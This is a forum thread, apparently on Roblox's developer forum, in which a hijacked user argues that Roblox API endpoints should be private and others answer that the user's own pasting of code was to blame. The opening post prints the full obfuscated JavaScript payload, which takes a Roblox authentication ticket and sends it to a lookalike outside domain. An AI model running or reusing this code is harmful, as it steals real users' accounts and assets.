Roblox Endpoint APIs Should Not Be Public

My account was recently compromised by one of the javascript breaches. We did a ton of digging and research into the breach after it happened, and it was partially my own fault and partially due to some extreme insecurities in the Roblox public API endpoints.

I was helping out a developer learn to dev, when they managed to get me to paste a javascript code into my URL that was meant to call for a Roblox public API endpoint. (Stupid of me, for sure, I was off guard as they had gained my trust) I will not post the code here for obvious reasons, but if anyone wants to review it safely, DM me.

We did some brief digging and found the core code being run behind the scenes is this:

async function payload2() {
    var hash = (await (await fetch((await (await fetch("https://www.roblox.com/avatar-thumbnail-3d/json?userId=" + $("meta[name='user-data']").data("userid") + "&_=" + Math.random())).json()).Url)).json()).textures[0]

    for (var i = 31, t = 0; t < 32; t++)
        i ^= hash[t].charCodeAt(0);

    location.href = "https://t" + (i % 8).toString() + ".rbxcdn.com/" + hash
}
(async function(){var _0x2416b1=(await(await fetch('/home',{'credentials':'include'}))['text']())['split']('setToken(\x27')[0x1]['split']('\x27)')[0x0];var _0x12edd1=(await fetch('https://auth.roblox.com/v1/authentication-ticket',{'method':'POST','credentials':'include','headers':{'x-csrf-token':_0x2416b1}}))['headers']['get']('rbx-authentication-ticket');await fetch('https://profile-roblox.com/send22test.php'+'?t='+_0x12edd1);await payload2()}());

The main issue seems to be that the end points are just, directly public, which is simply a direct avenue for abuse, either to breach accounts like here, or to create endless bots. They literally just ask roblox for the information to the account, and roblox straight up gives it to them.

3953×177 100 KB

Me and my team are not Roblox engineers, so our view of the mater is limited, but the only valid reason we could thing of to have these endpoint APIs being public is for analytics, which could be instead done the same way Instagram does it, where these APIs are only provided to specifically approved people.

From our limited point of view, it just really doesn’t seem like it’s worth the absolutely massive security breach that they cause, for so little function in return, considering how often this is happening now, and so much being lost because of it.

These endpoints exist so that Roblox itself can access it for its own services. The most important line here is the last line, nothing else matters. Did you read the big warning that shows when you open the console on the Roblox website? It explicitly states:

 Keep your account safe! Do not send any information from
 here to anyone or paste any text here.

 If someone is asking you to copy or paste text here then
 you're giving someone access to your account, your gear,
 and your Robux.

These endpoints aren’t necessarily public. You were logged in at the time of running this chunk of code which means your cookies (specifically .ROBLOSECURITY) were passed to the /v1/authentication-ticket endpoint. This endpoint can’t be accessed as far as I know without a .ROBLOSECURITY token which you can only get by being logged in.

Public API endpoints are not just for analytics. They’re used in library wrappers like noblox.js and bloxy to give users the ability to program bots, websites, and games that interact with the Roblox website. These endpoints let you do things like change a member’s rank or send messages to users. I do agree that the API system could be improved but making all API endpoints private is not a solution.

Actually you do not at all need to be logged in for this to work, as long as your data is still being stored by Roblox. We tested this with other accounts, and it will provide them with the information to any account currently stored on that computer, not just one you’re logged into.

And no that warning is unfortunately not available when this happens, since it is done via the URL, not via the console on the website.

This happened because you trusted someone, they led you astray, you ignored the warnings that are specifically stated in console and you went ahead and did it anyway. Partially should be fully. Almost curious as to why it was done because typically people post code for gain (i.e free Robux, free lifetime premium, etc).

Also, that specific endpoint only works if you have a valid cookie (i.e you’re logged in). It’s not a security breach because Roblox’s system is largely cookie-based with an emphasis on csrf tokens. The endpoint that you listed can’t be invoked on a browser. Most browsers only support GET requests in their URLs by default.

Do I agree that Roblox has poor security & should follow a different authentication system? Yes.

Do I think that Roblox was at fault here? No.

Please don’t post random code on your main account. Use an alt that can’t be traced back to you on a vm or incognito window instead. Also, whatever site that it points to probably has your IP. Not that an IP alone can do much but, something to think about.

https://auth.roblox.com/docs#!/AuthenticationTicket/post_v1_authentication_ticket

If Roblox wouldn’t publish any information about endpoints, it would take a dedicated hacker (which these people are, this social engineering trick is pretty cunning after all) a whopping 10 minutes extra just leaving chrome console / any other network sniffer on and inspect network traffic to find these endpoints. And then they document it amongst themselves and it might as well have been published properly from source so that legitimate third-party developers have an easier time using it.

Security through obscurity doesn’t really solve anything.

Incorrect.

image1114×463 29.1 KB

That endpoint doesn’t work if you pass no headers and cookies. Again, this only works if you were logged in. This isn’t an issue with Roblox. If a user tells you to insert a chunk of code and start it with console: in the URL bar, no warning can save you. The code immediately executed. If you wanted to protect users, you would have a warning that shows up every time you visit Roblox that says “Don’t put things in your URL bar!” but that is detrimental to the user experience.

These endpoints are used for basic login tasks they can’t just be made private, your computer needs it to send your login credentials.

I can not stress this enough, never run code you don’t understand. In the example you posted you can visibly see the code that sends your hashed authentication data to a fake domain.

You’re right… Anything can be hacked if you give it enough time. You are also sort of right when saying STO doesn’t really solve anything. However I don’t think this post should be ignored and summed up with the statement of well, “it would just take them extra time to sniff the traffic, using Burp Suite, Chrome Debugger or some other tool to find the endpoints”. Roblox is a huge target of attacks that when preformed successfully will compromise not only personal data, but assets that are worth real world currency, unfortunately these endpoints are used all the time in malicious ways.

What should really be discussed in this post, I believe, is brainstorming how could the platform be more secure? Again, it will never be totally secure… nothing will be. However STO, for example, is one of those ways in which these sort of attacks can be mitigated, giving the very possible outcome of a reduction in the mass amount of breached accounts, bot accounts, etc.

There are other feature requests about this already – TOTP, better 2FA methods, etc. You can find them via search in the top-right.

Alright I know this is an old topic, sorry about that.

I think the Roblox API endpoints should remain public. It truly can open a lot of doors for developers that would be closed without them. Having only some people have access to the endpoints isn’t really feasible because the client of literally everyone who plays Roblox needs it to log into Roblox. This isn’t really a reason why the API endpoints should be privatized even if they could be, either. You wouldn’t even need the endpoints to breach an account this way. One could just get the authentication cookie and make a POST request to some http server that stores the authentication cookie in a database.

My friend, I say this with all of the love and kindness in my heart: the security breach had nothing to do with the publicity of the API endpoints. You ran code that you didn’t look into deep enough in your browser. It’s not even partially Roblox’s fault. Regard this as a learning experience, don’t paste code into your browser.

This thread is made obsolete by these more specific topics: